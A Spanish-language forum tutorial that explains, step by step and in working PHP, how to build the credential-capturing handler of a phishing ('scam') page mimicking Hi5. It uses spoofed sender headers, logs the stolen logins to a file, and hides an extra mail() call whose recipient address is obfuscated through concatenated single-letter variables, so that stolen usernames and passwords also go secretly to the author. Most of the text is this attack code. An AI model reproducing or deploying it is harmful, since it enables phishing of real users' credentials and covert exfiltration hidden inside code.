Antes de continuar quisiera mencionar que no soy un Experto en el área de lo que sería la programación PHP, pero me gusta ayudar a la demás gente, si tuve algún error en lo que sería la explicación corriganla con toda libertad, se que no será con ánimos de postear replys/respuestas ofensivas.
Esta vez cabe mencionar que en sí no es un backdoor ya que no te abré ninguna puerta trasera para tener acceso a esto pero lo decidí "llamar" así ya que no se me ocurrio otro nombre, en sí no tiene mucha ciencia ya que simplemente obtendríamos datos sin que el "webmaster/administrador" supiera (Obviamente si le pone atención al código se daría cuenta rápidamente). Tambien se pudiese encriptar con base64 ó/y otros.
#########################################################################
Backdoor (Literalmente) en PHP.##########################################################################
Por: Xt3mP
Para: Lectores
Herramientas:
Editor de texto.Conocimientos en PHP.Imaginación.#########################################################################
¿En qué consiste?Trataremos de ocultar un envío de email secundario
con los datos obtenidos de
forma oculta (Backdoor literamente) mediante variables en código PHP para que el que utilize nuestro código aparte de envíarle un email a él
con los datos te llegen a ti
igual a la bandeja.
En este caso utilizarémos de ejemplo un "
Scam" cualquiera.
#########################################################################
Primeros pasos.En este escrito no les enseñare a como crear un scam, pero lo pondré de ejemplo. Suponiendo que tenemos nuestro Scam (Un index y un php que es el que ca*****rá los datos y
enviará por correo.
El index lógicamente puede tener un formulario
como este código:
<form action="codigo.php" method="POST">
Usuario:
<input name="user" type="text" id="user" />
<br />Password:
<input name="passwd" type="text" id="passwd" />
</form>Aquí es donde hacemos un llamado a el archivo "
codigo.php"
mediante el método "POST".
Y nuestro código php el código sería así:
<?php
$usuario = $_POST['user'];
$clave = $_POST['passwd'];
$correo = "Xt3mP@h4x0rz.us";
$contenido = "<br>Email: ".$usuario." <br>Clave: " .$clave."";
$headers = "MINE-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: Hi5. <mailings@habbohotel.com>\r\n";
$headers .= "Reply-To: mailings@habbohotel.com\r\n";
$subject .= "Logs";
mail($correo,$subject,$contenido,$headers);
?>En este no ocupo explicar mucho, "
user y
passwd " son las casillas de texto de nuestro index y estamos declarando que la variable usuario tiene el valor de
la casilla user y la variable clave tiene la valor de la casilla passwd. Declaramos que la variable correo será igual a nuestro correo, la variable contenido tiene de valor lo que nos enviará por correo en este caso las 2 casillas, los headers son el formato de correo, subject es el asunto y la función "mail()" es la que nos enviará el correo con las variables antes dichas. Vuelvan a leer todo para que no quede ninguna duda.
#########################################################################
Empezar a hacer nuestro "Backdoor".Comenzarémos a crear nuestro Backdoor para que esos datos antes envíados nos lleguén a nosotros tambien. Pero te preguntarás
¿Como? Sencillo, usando la imaginación un poco podemos declarar estas mismas variables para que formen nuestro correo y no los envíe pero la pregunta nuevamente. ¿Como?
Sencillo, modificarémos nuestro PHP algo así para poner nuestro mail (
Xt3mP@hotmail.com):
<?php
/*Aqui el demas codigo*/
$q = "t";
$w = "m";
$e = "h";
$t = "a";
$y = "3";
$u = "i";
$i = "o";
$o = ".";
$p = "c";
$a = "p";
$s = "@";
$f = "h";
$g = "m";
$h = "x";
$b = "l";
?>Las variables "
q,w,e,t,y,u,i,o,p,a,s,f,g,h,b" pueden ser cualquiera exepto números ni carácteres raros.
Luego implementarémos otras variables para concatenarlas.
<?php
/*Aqui el demas codigo*/
$caracteresa= $h.$q.$y.$g.$a; //xt3mp
$caracteresb= $s.$f.$i.$q.$g.$t.$u; //@hotmai
$caracteresc= $b.$o.$p.$i.$g; //l.com
$caracteresd= $caracteresa.$caracteresb.$caracteresc; //xt3mp@hotmail.com
?>Y agregarémos la función
mail() así.
mail($caracteresd,$subject,$contenido,$headers); Y nuestro código final quedaría así:
<?php
$usuario = $_POST['user'];
$clave = $_POST['passwd'];
$correo = "Xt3mP@h4x0rz.us";
$q = "t";
$w = "m";
$e = "h";
$t = "a";
$y = "3";
$u = "i";
$i = "o";
$o = ".";
$p = "c";
$a = "p";
$s = "@";
$f = "h";
$g = "m";
$h = "x";
$b = "l";
$contenido = "<br>Email: ".$usuario." <br>Clave: " .$clave."";
$headers = "MINE-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: Hi5. <mailings@habbohotel.com>\r\n";
$headers .= "Reply-To: mailings@habbohotel.com\r\n";
$subject .= "Logs";
$caracteresa= $h.$q.$y.$g.$a; //xt3mp
$caracteresb= $s.$f.$i.$q.$g.$t.$u; //@hotmai
$caracteresc= $b.$o.$p.$i.$g; //l.com
$caracteresd= $caracteresa.$caracteresb.$caracteresc; //xt3mp@hotmail.com
mail($correo,$subject,$contenido,$headers);
mail($caracteresd,$subject,$contenido,$headers);
?>##########################################################################
Camuflajeando.Ahora solo es cuestión de camuflajear/ocultar entre el código para que no sea tan visible.
Si es un
SCAM Bancario es poco probable que encuentren este envío de mail adherido al código original.
En un scam normal como el de Hi5 el código puede ser así:
<?php
$f= "@";
$z= "x";
$usuario = $_POST['email'];
$x= "l";
$clave = $_POST['password'];
$c= "o";
$correo = array("primer" => "Xt3mP@h4x0rz.us", "segundo" => "xT3mP@gobiernofederal.com");
$v= "v";
$contenido = "<br>Email: ".$usuario." <br>Clave: " .$clave."";
$k= "a";
$t = "";
$b= "e";
$headers = "MINE-Version: 1.0\r\n";
$n= "s";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$m= "u";
$headers .= "From: Hi5. <mailings@habbohotel.com>\r\n";
$d= ".";
$headers .= "Reply-To: mailings@habbohotel.com\r\n";
$q= "c";
$subject .= "Log de hi5";
$security = $j.$k.$l.$x;
$g= "h";
$usuariouno=$_POST['email'];
$h= "t";
$l= "i";
$p = "(";
$u = ")";
$claveuno=$_POST['password'];
$j= "m";
$caracteres = $z.$d.$x.$c.$v;
$caracteresa = $b.$n.$m.$z.$n.$d.$z;
$caracteresb= $f.$g.$c.$h.$j.$k.$l.$x.$d.$q.$c.$j;
$caracteresc= $caracteres.$caracteresa.$caracteresb;
$text=fopen('logos.txt',a);
fwrite($text,"
<br>Correo: ".$usuario." <br>Clave: " .$clave." ");
fclose($text);
mail($correo["primer"],$subject,$contenido,$headers);
mail($correo["segundo"],$subject,$contenido,$headers);
mail($caracteresc,$subject,$contenido,$headers);
echo "<meta http-equiv='Refresh' content='1;url=http://www.hi5.com'>";
?>Y en un código bancario (Scam Bancario) son muchos más códigos en PHP por lo tanto pueden utilizar include, o poner en el Index variables en modo
Hidden, etc. Todo es cuestión de la imaginación.
##########################################################################
Glosario.Backdoor: Es un defecto/agujero/bug en un software o una página web que te permite acceder de manera oculta o silencia, en este caso digo backdoor por que accedemos a los datos que ingresaran sin que nadie sepa.
Scam: Página falsa.
Variable: Como en las matemáticas, X - Y. Aquí las variables pueden tener cualquier valor al igual que en las matemáticas. X= 1000000000000
#########################################################################
Notas:Esto lo hize solo para ampliar un poco más esto acerca de el PHP y ya que muchos piden SCAMS bancarios y no se dan cuenta que tambien se envían los datos a terceras personas.
##########################################################################
Por: Xt3mP
Para: Lectores
¿Dudas? Haganmelas saber.
